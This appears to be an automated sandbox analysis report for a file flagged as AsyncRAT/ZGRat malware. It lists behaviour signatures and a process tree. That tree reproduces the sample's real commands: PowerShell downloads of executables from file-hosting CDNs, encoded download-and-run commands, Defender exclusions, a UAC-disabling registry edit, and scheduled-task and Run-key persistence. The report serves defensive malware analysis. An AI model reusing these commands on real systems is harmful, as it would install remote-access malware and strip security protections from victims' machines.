Analysis Overview
SHA256
f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a
Threat Level: Known bad
The file resources.exe was found to be: Known bad.
Malicious Activity Summary
AsyncRat
UAC bypass
ZGRat
Detect ZGRat V1
Async RAT payload
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Executes dropped EXE
Drops startup file
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Drops desktop.ini file(s)
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
Program crash
Suspicious use of SetWindowsHookEx
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies registry class
Suspicious use of FindShellTrayWindow
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Enumerates system info in registry
Modifies registry key
Creates scheduled task(s)
Suspicious use of SendNotifyMessage
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Opens file in notepad (likely ransom note)
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-15 10:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-15 10:45
Reported
2023-11-15 10:57
Platform
win10v2004-20231025-en
Max time kernel
527s
Max time network
746s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunNihaiersion.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunNihaiersion.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunihaiVersion.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe | C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe | C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe | N/A |
Executes dropped EXE
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinDefatullt = "C:\\Users\\Admin\\AppData\\Roaming\\WinDefatullt\\WinDefatullt.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OperaCert = "C:\\Users\\Admin\\AppData\\Roaming\\OperaCert\\OperaCert.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioCert = "C:\\Users\\Admin\\AppData\\Roaming\\VisualStudioCert\\VisualStudioCert.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioCert = "C:\\Users\\Admin\\AppData\\Roaming\\VisualStudioCert\\VisualStudioCert.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\users\public\desktop.ini | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | \??\c:\users\public\music\desktop.ini | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | \??\c:\users\public\downloads\desktop.ini | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | \??\c:\users\admin\downloads\desktop.ini | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | \??\c:\users\admin\desktop\desktop.ini | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\2WinDefault.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\2WinDefault.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133445190141227845" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\resources.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\resources.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\resources.exe
"C:\Users\Admin\AppData\Local\Temp\resources.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\942b40ad-7020-471a-9c95-e0a7b8aef8c5.bat
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\VisualStudio.csproj
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"
C:\Users\Public\Music\RunNihaiersion.exe
RunNihaiersion.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil.exe
"C:\Users\Public\Music\israil.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"
C:\Users\Public\Music\RunihaiVersion.exe
RunihaiVersion.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil2.exe
"C:\Users\Public\Music\israil2.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\942b40ad-7020-471a-9c95-e0a7b8aef8c5.bat
C:\Users\Admin\AppData\Local\Temp\xx.exe
xx.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe
C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe
C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\AkW22FbGMd.exe
C:\Users\Admin\AppData\Local\Temp\AkW22FbGMd.exe
C:\Users\Admin\AppData\Local\Temp\AkW22FbGMd.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADEAMQA0ADYANAAwADYAOQAyADkAMwAvAFcAaQBuAEQAZgB1AGwAdAAuAGUAeABlACcALAAgADwAIwBkAHgAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcABsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIAVwBpAG4ARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwB3AHkAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBqAGQAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBqAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgBXAGkAbgBEAGUAZgBhAHUAbAB0AC4AZQB4AGUAJwApADwAIwB2AHMAaQAjAD4A"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADYANwA1ADQAMAA4ADEANgA4ADkAMAAzADAAMgA1ADcANAAvADEAMQA2ADcANQA0ADAAOQA4ADMAMQAyADMAMQA0ADgAOAAxADAALwBDAGgAcgBvAG0AZQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGgAYwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBmAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwBoAHIAbwBtAGUAQwByAHQALgBlAHgAZQAnACkAKQA8ACMAZQB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBlAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAdQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMAaAByAG8AbQBlAEMAcgB0AC4AZQB4AGUAJwApADwAIwBpAHEAbQAjAD4A"
C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe
C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdgB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAxADkAMAA4ADEAMgA1ADEANgAzADkAMwAvAFYAaQBzAHUAYQBsAFMAdAB1AGQAaQBvAEMAZQByAHQALgBlAHgAZQAnACwAIAA8ACMAcQBmAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAHcAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAGwAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApACkAPAAjAG4AbABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAdwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHkAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApADwAIwBxAHEAZwAjAD4A"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe
C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe
C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZQB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADMAMwAyADUANwA2ADcAMgA4ADIANgAvAE8AcABlAHIAYQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGwAYgB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgB2AG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeABkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATwBwAGUAcgBhAEMAcgB0AC4AZQB4AGUAJwApACkAPAAjAGQAagBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAdABuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AGQAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBPAHAAZQByAGEAQwByAHQALgBlAHgAZQAnACkAPAAjAGwAaABkACMAPgA="
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\6rs03E3DBT.exe
C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe
C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe
C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe
C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMAA5ADkANQAyADMANgAzADEAOQAzADEAMwAvAFcAaQBuAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACwAIAA8ACMAcgBoAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGEAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGQAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwBrAGUAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHIAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACkAPAAjAGgAZgB3ACMAPgA="
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"
C:\Users\Admin\AppData\Roaming\WiDefault.exe
"C:\Users\Admin\AppData\Roaming\WiDefault.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
